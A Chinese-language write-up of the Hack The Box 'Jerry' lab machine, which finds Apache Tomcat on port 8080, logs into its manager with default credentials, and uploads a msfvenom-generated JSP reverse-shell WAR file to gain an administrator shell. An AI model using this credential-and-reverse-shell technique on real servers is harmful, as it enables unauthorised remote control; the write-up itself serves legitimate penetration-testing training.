HTB：Jerry渗透测试

zhaorong · 发表于 WEB前端技术 2021-6-16 17:01:56


	基础信息简介：Hack The Box是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能平台环境都是模拟的真实环境有助于自己更好的适应在真实环境的渗透链接：https://www.hackthebox.eu/home/machines/profile/144 描述：前言本次演练使用kali系统按照渗透测试的过程进行操作通过nmap发现端口开放了tomcat8080端口使用密码登录tomcat 使用msfvenom 生成war文件上传到tomcat中通过反弹获取shell。一、信息收集 1、靶机ip IP地址为：10.10.10.95 2、靶机端口与服务 nmap -sV -sS -T4 -O -A 10.10.10.95 复制代码 PORT STATE SERVICE VERSION 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 \|_http-server-header: Apache-Coyote/1.1 \|_http-title: Apache Tomcat/7.0.88 复制代码 3、网站信息收集查看8080端口通过dirsearch进行目录扫描获取网站目录这里我列出了部分需要的目录 /host-manager/html /manager/html /manager/ 复制代码二、漏洞探测与利用 1、生成木马文件进入/host-manager/html目录发现需要账号密码点击取消后再返回界面发现账号与密码 username="tomcat" password="s3cret" 使用该密码进行登录返回403页面无法正常进行登录最后在/manager/目录下成功登录发现可以上传war格式文件使用msfvenom生成shell文件 msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.1 4.2 LPORT=4444 -f war > shell.war 复制代码 2、使用msf获取shell 首先设置好msf 使用msf监听4444端口获取反弹的shell 在登陆页面上传war文件上传成功后点击shell 成功获取到shell 三、提权使用这种方式所获取的直接是authority权限可直接查看root.txt 进入 \Users\Administrator\Desktop目录发现没有root.txt但是存在flags 进入flags目录使用type命令查看2 for the price of 1.txt文件获取到root.txt与user.txt

微信扫一扫 分享朋友圈

HTB：Jerry渗透测试

微信扫一扫分享朋友圈